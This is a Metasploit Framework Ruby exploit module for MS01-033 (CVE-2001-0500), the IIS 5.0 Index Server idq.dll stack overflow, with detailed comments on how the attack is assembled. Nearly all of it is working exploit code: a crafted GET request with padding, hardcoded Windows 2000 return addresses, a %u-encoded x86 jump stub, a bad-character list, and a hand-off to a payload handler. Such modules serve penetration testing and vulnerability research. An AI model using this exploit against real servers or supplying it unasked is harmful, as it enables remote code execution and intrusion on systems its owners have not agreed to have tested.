##
# $Id: ms01_033_idq.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
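require 'msf/core'

##
# MS01-033 / CVE-2001-0500: stack buffer overflow in the Index Server ISAPI
# handler (idq.dll) on IIS 5.0.
#
# The whole attack is one GET request for a ".idq" resource whose query
# string is built in #exploit. The return address and the small stub after
# it are sent as %uXXXX sequences: idq.dll decodes these into raw 16-bit
# words, which is how bytes that could never survive as literal URI
# characters (see the BadChars list) reach the stack.
##
class Metasploit3 < Msf::Exploit::Remote

  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata.
  #
  # 'Ret' is deliberately a "0x" + 8-hex-digit String rather than the
  # framework's usual Integer: #exploit slices the two 16-bit halves straight
  # out of the text to build the %u words. #ret_words accepts an Integer as
  # well, so targets added later may use either form.
  #
  # BadChars are the bytes the URI cannot carry as-is before idq.dll sees
  # the request: NUL, ':', '&', '?', '%', '#', space, LF, CR, '/', '+', VT
  # and '\'. The payload is placed into the URI unencoded-by-%u, so its
  # encoder must honour this list.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft IIS 5.0 IDQ Path Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the IDQ ISAPI handler for
        Microsoft Index Server.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9525 $',
      'References'     =>
        [
          [ 'CVE', '2001-0500' ],
          [ 'OSVDB', '568' ],
          [ 'MSB', 'MS01-033' ],
          [ 'BID', '2880' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'           => 800,
          'BadChars'        => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 Pro English SP0',     { 'Ret' => '0x6e8f3e24' } ],
          [ 'Windows 2000 Pro English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ],
        ],
      'DisclosureDate' => 'Jun 18 2001',
      'DefaultTarget'  => 0))

    register_options([ Opt::RPORT(80) ], self.class)
  end

  # Send the single malicious GET and hand off to the payload handler.
  #
  # Layout of the URI (everything after the leading '/'):
  #
  #   <1 random char>.idq?<232 random chars>   padding up to the saved return address
  #   %u06eb.                                  decodes to EB 06 = x86 "jmp short" over
  #                                            the next 6 bytes (presumably the '.',
  #                                            the 4 address bytes and the next '.')
  #   %u<low word>%u<high word>.               target return address as two
  #                                            little-endian 16-bit words
  #   %uC033 ... %uE0FF=                       %u-encoded x86 stub; its last word
  #                                            decodes to FF E0 (jmp eax), so it is
  #                                            expected to locate the payload and
  #                                            jump to it -- not verified here
  #   <1 random char> HTTP/1.0\r\n\r\n<46 random chars>
  #   <payload.encoded>
  #
  # Note that " HTTP/1.0\r\n\r\n" is part of `uri`, i.e. the encoded payload
  # follows the request-line terminator; the trailing "\r\n\r\n" appended to
  # `res` only closes the request.
  #
  # The target's 'Ret' is validated before the socket is opened so a
  # malformed target entry fails loudly instead of silently sending a
  # garbage address. The socket is always released, even if the write fails.
  #
  # @raise [ArgumentError] if the selected target's 'Ret' is unusable
  def exploit
    low_word, high_word = ret_words(target.ret)

    connect
    begin
      sploit =  rand_text_alphanumeric(1) + ".idq?" + rand_text_alphanumeric(232)
      sploit << "%u06eb.%u" + low_word + "%u" + high_word
      sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF="
      sploit << rand_text_alphanumeric(1) + " HTTP/1.0\r\n\r\n" + rand_text_alphanumeric(46)

      uri = '/' + sploit + payload.encoded
      res = "GET #{uri}\r\n\r\n"

      print_status("Trying target #{target.name}...")
      sock.put(res)

      handler
    ensure
      disconnect
    end
  end

  private

  # Split a return address into the two 4-hex-digit words that the
  # %u-encoded overflow string needs, low word first.
  #
  # For the String form used by this module's targets ("0x" + 8 hex digits)
  # the characters are sliced out exactly as the original code did, so the
  # bytes on the wire are unchanged. An Integer is formatted the same way.
  #
  # @param ret [String, Integer] the target return address
  # @return [Array<String>] [low_word, high_word]
  # @raise [ArgumentError] if ret is neither an Integer nor 0x + 8 hex digits
  def ret_words(ret)
    case ret
    when Integer
      [ '%04x' % (ret & 0xffff), '%04x' % ((ret >> 16) & 0xffff) ]
    when /\A0x[0-9a-fA-F]{8}\z/
      [ ret[-4, 4], ret[-8, 4] ]
    else
      raise ArgumentError, "Target 'Ret' must be an Integer or a 0x-prefixed 8-digit hex string, got #{ret.inspect}"
    end
  end

end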